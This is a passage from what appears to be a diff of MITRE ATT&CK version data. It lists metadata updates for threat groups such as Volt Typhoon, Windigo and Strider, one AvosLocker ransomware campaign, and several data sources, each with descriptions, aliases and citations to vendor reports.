Falcon](https://attack.mitre.org/groups/G0038) is a threat group that has conducted targeted spyware attacks against Emirati journalists, activists, and dissidents since at least 2012. Circumstantial evidence suggests there could be a link between this group and the United Arab Emirates (UAE) government, but that has not been confirmed. (Citation: Citizen Lab Stealth Falcon May 2016)", + "aliases": [ + "Stealth Falcon" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0038", + "external_id": "G0038" + }, + { + "source_name": "Stealth Falcon", + "description": "(Citation: Citizen Lab Stealth Falcon May 2016)" + }, + { + "source_name": "Citizen Lab Stealth Falcon May 2016", + "description": "Marczak, B. and Scott-Railton, J.. (2016, May 29). Keep Calm and (Don\u2019t) Enable Macros: A New Threat Actor Targets UAE Dissidents. Retrieved June 8, 2016.", + "url": "https://citizenlab.org/2016/05/stealth-falcon/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:49:04.710000+00:00\", \"old_value\": \"2025-04-16 20:37:35.038000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--277d2f87-2ae5-4730-a3aa-50c1fdff9656", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:07.541000+00:00", + "modified": "2025-04-25 14:49:43.099000+00:00", + "name": "Strider", + "description": "[Strider](https://attack.mitre.org/groups/G0041) is a threat group that has been active since at least 2011 and has targeted victims in Russia, China, Sweden, Belgium, Iran, and Rwanda.(Citation: Symantec Strider Blog)(Citation: Kaspersky ProjectSauron Blog)", + "aliases": [ + "Strider", + "ProjectSauron" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0041", + "external_id": "G0041" + }, + { + "source_name": "Strider", + "description": "(Citation: Symantec Strider Blog) (Citation: Kaspersky ProjectSauron Blog)" + }, + { + "source_name": "ProjectSauron", + "description": "ProjectSauron is used to refer both to the threat group also known as G0041 as well as the malware platform also known as S0125. (Citation: Kaspersky ProjectSauron Blog) (Citation: Kaspersky ProjectSauron Full Report)" + }, + { + "source_name": "Symantec Strider Blog", + "description": "Symantec Security Response. (2016, August 7). Strider: Cyberespionage group turns eye of Sauron on targets. Retrieved August 17, 2016.", + "url": "http://www.symantec.com/connect/blogs/strider-cyberespionage-group-turns-eye-sauron-targets" + }, + { + "source_name": "Kaspersky ProjectSauron Blog", + "description": "Kaspersky Lab's Global Research & Analysis Team. (2016, August 8). ProjectSauron: top level cyber-espionage platform covertly extracts encrypted government comms. Retrieved August 17, 2016.", + "url": "https://securelist.com/faq-the-projectsauron-apt/75533/" + }, + { + "source_name": "Kaspersky ProjectSauron Full Report", + "description": "Kaspersky Lab's Global Research & Analysis Team. (2016, August 9). The ProjectSauron APT. Retrieved August 17, 2016.", + "url": "https://securelist.com/files/2016/07/The-ProjectSauron-APT_research_KL.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:49:43.099000+00:00\", \"old_value\": \"2025-04-16 20:37:41.346000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--62a64fd3-aaf7-4d09-a375-d6f8bb118481", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-04-18 17:59:24.739000+00:00", + "modified": "2025-04-25 14:49:19.743000+00:00", + "name": "TA459", + "description": "[TA459](https://attack.mitre.org/groups/G0062) is a threat group believed to operate out of China that has targeted countries including Russia, Belarus, Mongolia, and others. (Citation: Proofpoint TA459 April 2017)", + "aliases": [ + "TA459" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0062", + "external_id": "G0062" + }, + { + "source_name": "TA459", + "description": "(Citation: Proofpoint TA459 April 2017)" + }, + { + "source_name": "Proofpoint TA459 April 2017", + "description": "Axel F. (2017, April 27). APT Targets Financial Analysts with CVE-2017-0199. Retrieved February 15, 2018.", + "url": "https://www.proofpoint.com/us/threat-insight/post/apt-targets-financial-analysts" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Valerii Marchuk, Cybersecurity Help s.r.o." + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:49:19.743000+00:00\", \"old_value\": \"2025-04-16 20:37:37.273000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--6688d679-ccdb-4f12-abf6-c7545dd767a4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-05-02 00:08:18.314000+00:00", + "modified": "2025-04-25 14:49:32.865000+00:00", + "name": "The White Company", + "description": "[The White Company](https://attack.mitre.org/groups/G0089) is a likely state-sponsored threat actor with advanced capabilities. From 2017 through 2018, the group led an espionage campaign called Operation Shaheen targeting government and military organizations in Pakistan.(Citation: Cylance Shaheen Nov 2018)", + "aliases": [ + "The White Company" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0089", + "external_id": "G0089" + }, + { + "source_name": "Cylance Shaheen Nov 2018", + "description": "Livelli, K, et al. (2018, November 12). Operation Shaheen. Retrieved May 1, 2019.", + "url": "https://www.cylance.com/content/dam/cylance-web/en-us/resources/knowledge-center/resource-library/reports/WhiteCompanyOperationShaheenReport.pdf?_ga=2.161661948.1943296560.1555683782-1066572390.1555511517" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:49:32.865000+00:00\", \"old_value\": \"2025-04-16 20:37:39.790000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--d519164e-f5fa-4b8c-a1fb-cf0172ad0983", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:31:59.120000+00:00", + "modified": "2025-04-25 14:49:05.962000+00:00", + "name": "Threat Group-1314", + "description": "[Threat Group-1314](https://attack.mitre.org/groups/G0028) is an unattributed threat group that has used compromised credentials to log into a victim's remote access infrastructure. (Citation: Dell TG-1314)", + "aliases": [ + "Threat Group-1314", + "TG-1314" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0028", + "external_id": "G0028" + }, + { + "source_name": "Threat Group-1314", + "description": "(Citation: Dell TG-1314)" + }, + { + "source_name": "TG-1314", + "description": "(Citation: Dell TG-1314)" + }, + { + "source_name": "Dell TG-1314", + "description": "Dell SecureWorks Counter Threat Unit Special Operations Team. (2015, May 28). Living off the Land. Retrieved January 26, 2016.", + "url": "http://www.secureworks.com/resources/blog/living-off-the-land/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:49:05.962000+00:00\", \"old_value\": \"2025-04-16 20:37:35.353000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--d69e568e-9ac8-4c08-b32c-d93b43ba9172", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:49:36.307000+00:00", + "name": "Thrip", + "description": "[Thrip](https://attack.mitre.org/groups/G0076) is an espionage group that has targeted satellite communications, telecoms, and defense contractor companies in the U.S. and Southeast Asia. The group uses custom malware as well as \"living off the land\" techniques. (Citation: Symantec Thrip June 2018)", + "aliases": [ + "Thrip" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0076", + "external_id": "G0076" + }, + { + "source_name": "Thrip", + "description": "(Citation: Symantec Thrip June 2018)" + }, + { + "source_name": "Symantec Thrip June 2018", + "description": "Security Response Attack Investigation Team. (2018, June 19). Thrip: Espionage Group Hits Satellite, Telecoms, and Defense Companies. Retrieved July 10, 2018.", + "url": "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:49:36.307000+00:00\", \"old_value\": \"2025-04-16 20:37:40.404000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--174279b4-399f-4ddb-966e-5efedd1dd5f2", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2023-07-27 20:35:46.206000+00:00", + "modified": "2025-04-30 13:27:45.018000+00:00", + "name": "Volt Typhoon", + "description": "[Volt Typhoon](https://attack.mitre.org/groups/G1017) is a People's Republic of China (PRC) state-sponsored actor that has been active since at least 2021 primarily targeting critical infrastructure organizations in the US and its territories including Guam. [Volt Typhoon](https://attack.mitre.org/groups/G1017)'s targeting and pattern of behavior have been assessed as pre-positioning to enable lateral movement to operational technology (OT) assets for potential destructive or disruptive attacks. [Volt Typhoon](https://attack.mitre.org/groups/G1017) has emphasized stealth in operations using web shells, living-off-the-land (LOTL) binaries, hands on keyboard activities, and stolen credentials.(Citation: CISA AA24-038A PRC Critical Infrastructure February 2024)(Citation: Microsoft Volt Typhoon May 2023)(Citation: Joint Cybersecurity Advisory Volt Typhoon June 2023)(Citation: Secureworks BRONZE SILHOUETTE May 2023)", + "aliases": [ + "Volt Typhoon", + "BRONZE SILHOUETTE", + "Vanguard Panda", + "DEV-0391", + "UNC3236", + "Voltzite", + "Insidious Taurus" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G1017", + "external_id": "G1017" + }, + { + "source_name": "Vanguard Panda", + "description": "(Citation: CISA AA24-038A PRC Critical Infrastructure February 2024)" + }, + { + "source_name": "DEV-0391", + "description": "(Citation: CISA AA24-038A PRC Critical Infrastructure February 2024)" + }, + { + "source_name": "UNC3236", + "description": "(Citation: CISA AA24-038A PRC Critical Infrastructure February 2024)" + }, + { + "source_name": "Voltzite", + "description": "(Citation: CISA AA24-038A PRC Critical Infrastructure February 2024)" + }, + { + "source_name": "Insidious Taurus", + "description": "(Citation: CISA AA24-038A PRC Critical Infrastructure February 2024)" + }, + { + "source_name": "BRONZE SILHOUETTE", + "description": "(Citation: Secureworks BRONZE SILHOUETTE May 2023)(Citation: CISA AA24-038A PRC Critical Infrastructure February 2024)" + }, + { + "source_name": "CISA AA24-038A PRC Critical Infrastructure February 2024", + "description": "CISA et al.. (2024, February 7). PRC State-Sponsored Actors Compromise and Maintain Persistent Access to U.S. Critical Infrastructure. Retrieved May 15, 2024.", + "url": "https://www.cisa.gov/sites/default/files/2024-03/aa24-038a_csa_prc_state_sponsored_actors_compromise_us_critical_infrastructure_3.pdf" + }, + { + "source_name": "Secureworks BRONZE SILHOUETTE May 2023", + "description": "Counter Threat Unit Research Team. (2023, May 24). Chinese Cyberespionage Group BRONZE SILHOUETTE Targets U.S. Government and Defense Organizations. Retrieved July 27, 2023.", + "url": "https://www.secureworks.com/blog/chinese-cyberespionage-group-bronze-silhouette-targets-us-government-and-defense-organizations" + }, + { + "source_name": "Microsoft Volt Typhoon May 2023", + "description": "Microsoft Threat Intelligence. (2023, May 24). Volt Typhoon targets US critical infrastructure with living-off-the-land techniques. Retrieved July 27, 2023.", + "url": "https://www.microsoft.com/en-us/security/blog/2023/05/24/volt-typhoon-targets-us-critical-infrastructure-with-living-off-the-land-techniques/" + }, + { + "source_name": "Joint Cybersecurity Advisory Volt Typhoon June 2023", + "description": "NSA et al. (2023, May 24). People's Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection. Retrieved July 27, 2023.", + "url": "https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Ai Kimura, NEC Corporation", + "Manikantan Srinivasan, NEC Corporation India", + "Phyo Paing Htun (ChiLai), I-Secure Co.,Ltd", + "Pooja Natarajan, NEC Corporation India", + "Vlad Shumaher, Palo Alto Networks" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "2.0", + "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-30 13:27:45.018000+00:00\", \"old_value\": \"2024-05-21 20:12:20.029000+00:00\"}}, \"iterable_item_added\": {\"root['x_mitre_contributors'][4]\": \"Vlad Shumaher, Palo Alto Networks\"}}", + "previous_version": "2.0" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--4e868dad-682d-4897-b8df-2dc98f46c68a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-02-10 19:57:38.042000+00:00", + "modified": "2025-04-25 14:49:09.909000+00:00", + "name": "Windigo", + "description": "The [Windigo](https://attack.mitre.org/groups/G0124) group has been operating since at least 2011, compromising thousands of Linux and Unix servers using the [Ebury](https://attack.mitre.org/software/S0377) SSH backdoor to create a spam botnet. Despite law enforcement intervention against the creators, [Windigo](https://attack.mitre.org/groups/G0124) operators continued updating [Ebury](https://attack.mitre.org/software/S0377) through 2019.(Citation: ESET Windigo Mar 2014)(Citation: CERN Windigo June 2019)", + "aliases": [ + "Windigo" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0124", + "external_id": "G0124" + }, + { + "source_name": "ESET Windigo Mar 2014", + "description": "Bilodeau, O., Bureau, M., Calvet, J., Dorais-Joncas, A., L\u00e9veill\u00e9, M., Vanheuverzwijn, B. (2014, March 18). Operation Windigo \u2013 the vivisection of a large Linux server\u2011side credential\u2011stealing malware campaign. Retrieved February 10, 2021.", + "url": "https://www.welivesecurity.com/2014/03/18/operation-windigo-the-vivisection-of-a-large-linux-server-side-credential-stealing-malware-campaign/" + }, + { + "source_name": "CERN Windigo June 2019", + "description": "CERN. (2019, June 4). 2019/06/04 Advisory: Windigo attacks. Retrieved February 10, 2021.", + "url": "https://security.web.cern.ch/advisories/windigo/windigo.shtml" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:49:09.909000+00:00\", \"old_value\": \"2025-04-16 20:37:36.164000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--16ade1aa-0ea1-4bb7-88cc-9079df2ae756", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:31:53.579000+00:00", + "modified": "2025-04-25 14:48:47.886000+00:00", + "name": "admin@338", + "description": "[admin@338](https://attack.mitre.org/groups/G0018) is a China-based cyber threat group. It has previously used newsworthy events as lures to deliver malware and has primarily targeted organizations involved in financial, economic, and trade policy, typically using publicly available RATs such as [PoisonIvy](https://attack.mitre.org/software/S0012), as well as some non-public backdoors. (Citation: FireEye admin@338)", + "aliases": [ + "admin@338" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0018", + "external_id": "G0018" + }, + { + "source_name": "admin@338", + "description": "(Citation: FireEye admin@338)" + }, + { + "source_name": "FireEye admin@338", + "description": "FireEye Threat Intelligence. (2015, December 1). China-based Cyber Threat Group Uses Dropbox for Malware Communications and Targets Hong Kong Media Outlets. Retrieved December 4, 2015.", + "url": "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Tatsuya Daitoku, Cyber Defense Institute, Inc." + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:48:47.886000+00:00\", \"old_value\": \"2025-04-16 20:37:33.261000+00:00\"}}}", + "previous_version": "1.2" + } + ], + "revocations": [], + "deprecations": [], + "deletions": [] + }, + "campaigns": { + "additions": [], + "major_version_changes": [], + "minor_version_changes": [], + "other_version_changes": [], + "patches": [ + { + "type": "campaign", + "id": "campaign--519ee082-8ab6-439b-988f-a8a3f02c8d30", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2023-01-17 21:42:34.998000+00:00", + "modified": "2025-04-21 19:40:47.537000+00:00", + "name": "C0018", + "description": "\n[C0018](https://attack.mitre.org/campaigns/C0018) was a month-long ransomware intrusion that successfully deployed [AvosLocker](https://attack.mitre.org/software/S1053) onto a compromised network. The unidentified actors gained initial access to the victim network through an exposed server and used a variety of open-source tools prior to executing [AvosLocker](https://attack.mitre.org/software/S1053).(Citation: Costa AvosLocker May 2022)(Citation: Cisco Talos Avos Jun 2022)", + "aliases": [ + "C0018" + ], + "first_seen": "2022-02-01 05:00:00+00:00", + "last_seen": "2022-03-01 05:00:00+00:00", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/campaigns/C0018", + "external_id": "C0018" + }, + { + "source_name": "Costa AvosLocker May 2022", + "description": "Costa, F. (2022, May 1). RaaS AvosLocker Incident Response Analysis. Retrieved January 11, 2023.", + "url": "https://www.linkedin.com/pulse/raas-avoslocker-incident-response-analysis-fl%C3%A1vio-costa?trk=articles_directory" + }, + { + "source_name": "Cisco Talos Avos Jun 2022", + "description": "Venere, G. Neal, C. (2022, June 21). Avos ransomware group expands with new attack arsenal. Retrieved January 11, 2023.", + "url": "https://blog.talosintelligence.com/avoslocker-new-arsenal/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Fl\u00e1vio Costa, @Seguran\u00e7a Descomplicada" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_first_seen_citation": "(Citation: Cisco Talos Avos Jun 2022)", + "x_mitre_last_seen_citation": "(Citation: Cisco Talos Avos Jun 2022)", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-21 19:40:47.537000+00:00\", \"old_value\": \"2025-04-16 20:37:46.763000+00:00\"}, \"root['x_mitre_contributors'][0]\": {\"new_value\": \"Fl\\u00e1vio Costa, @Seguran\\u00e7a Descomplicada\", \"old_value\": \"Flavio Costa, Cisco\"}}}", + "previous_version": "1.0" + } + ], + "revocations": [], + "deprecations": [], + "deletions": [] + }, + "assets": { + "additions": [], + "major_version_changes": [], + "minor_version_changes": [], + "other_version_changes": [], + "patches": [], + "revocations": [], + "deprecations": [], + "deletions": [] + }, + "mitigations": { + "additions": [], + "major_version_changes": [], + "minor_version_changes": [], + "other_version_changes": [], + "patches": [], + "revocations": [], + "deprecations": [], + "deletions": [] + }, + "datasources": { + "additions": [], + "major_version_changes": [], + "minor_version_changes": [], + "other_version_changes": [], + "patches": [ + { + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--d6188aac-17db-4861-845f-57c369f9b4c8", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0026", + "external_id": "DS0026" + }, + { + "source_name": "Microsoft AD DS Getting Started", + "description": "Foulds, I. et al. (2018, August 7). AD DS Getting Started. Retrieved September 23, 2021.", + "url": "https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/ad-ds-getting-started" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:49:52.686Z", + "name": "Active Directory", + "description": "A database and set of services that allows administrators to manage permissions, access to network resources, and stored data objects (user, group, application, or devices)(Citation: Microsoft AD DS Getting Started)", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Identity Provider" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Cloud Control Plane", + "Host" + ], + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:49:52.686Z\", \"old_value\": \"2025-04-16T20:39:09.450Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--40269753-26bd-437b-986e-159c66dec5e4", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0015", + "external_id": "DS0015" + }, + { + "source_name": "Confluence Logs", + "description": "Confluence Support. (2021, April 22). Working with Confluence Logs. Retrieved September 23, 2021.", + "url": "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:40:03.068Z", + "name": "Application Log", + "description": "Events collected by third-party services such as mail servers, web applications, or other appliances (not by the native OS or platform)(Citation: Confluence Logs)", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "IaaS", + "Linux", + "SaaS", + "Windows", + "macOS", + "Office Suite", + "ESXi" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_collection_layers": [ + "Cloud Control Plane", + "Host" + ], + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:40:03.068Z\", \"old_value\": \"2025-04-16T20:39:10.207Z\"}}}", + "previous_version": "1.1" + }, + { + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--29aa4e0e-4a26-4f79-a9bc-1ae66df1c923", + "created": "2021-10-20T15:05:19.275Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0037", + "external_id": "DS0037" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:49:54.643Z", + "name": "Certificate", + "description": "A digital document, which highlights information such as the owner's identity, used to instill trust in public keys used while encrypting network communications", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_collection_layers": [ + "OSINT" + ], + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:49:54.643Z\", \"old_value\": \"2025-04-16T20:39:10.496Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--dd75f457-8dc0-4a24-9ae5-4b61c33af866", + "created": "2021-10-20T15:05:19.275Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0038", + "external_id": "DS0038" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:49:57.359Z", + "name": "Domain Name", + "description": "Information obtained (commonly through registration or activity logs) regarding one or more IP addresses registered with human readable names (ex: mitre.org)", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_collection_layers": [ + "OSINT" + ], + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:49:57.359Z\", \"old_value\": \"2025-04-16T20:39:11.900Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--61bbbf27-f7c3-46ba-a6bc-48ae76928065", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0016", + "external_id": "DS0016" + }, + { + "source_name": "Sysmon EID 9", + "description": "Russinovich, R. & Garnier, T. (2021, August 18). Sysmon Event ID 9. Retrieved September 24, 2021.", + "url": "https://docs.microsoft.com/sysinternals/downloads/sysmon#event-id-9-rawaccessread" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:40:06.700Z", + "name": "Drive", + "description": "A non-volatile data storage device (hard drive, floppy disk, USB flash drive) with at least one formatted partition, typically mounted to the file system and/or assigned a drive letter(Citation: Sysmon EID 9)", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack", + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "detailed_diff": "{\"dictionary_item_added\": 